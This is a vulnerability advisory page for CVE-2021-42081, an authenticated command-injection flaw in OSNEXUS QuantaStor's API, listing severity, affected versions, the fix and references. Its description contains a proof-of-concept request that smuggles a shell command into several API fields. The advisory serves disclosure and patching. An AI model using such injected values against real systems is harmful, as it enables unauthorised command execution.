What’s Vulnerable › Vulnerabilities
CVE-2021-42081: Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355
- Severity: high (CVSS 7.2 v3.1)
- Exploited in the wild: not listed in CISA KEV
- EPSS: 1.2% probability of exploitation in the next 30 days
- Public exploit or detection template: none known
- Published: 2023-07-10 · updated 2026-06-17
- Weakness: CWE-78
Description
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Affected products
- OSNEXUS QuantaStor: before 6.0.0.355 — fixed in 6.0.0.355
How to fix
Upgrade to a fixed version: OSNEXUS QuantaStor 6.0.0.355. Check the vendor advisory for mitigations.
References
- https://csirt.divd.nl/CVE-2021-42081
- https://csirt.divd.nl/DIVD-2021-00020/
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
- https://csirt.divd.nl/CVE-2021-42081
- https://www.divd.nl/DIVD-2021-00020
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
Get alerted when CVE-2021-42081 or the next vulnerability affects your stack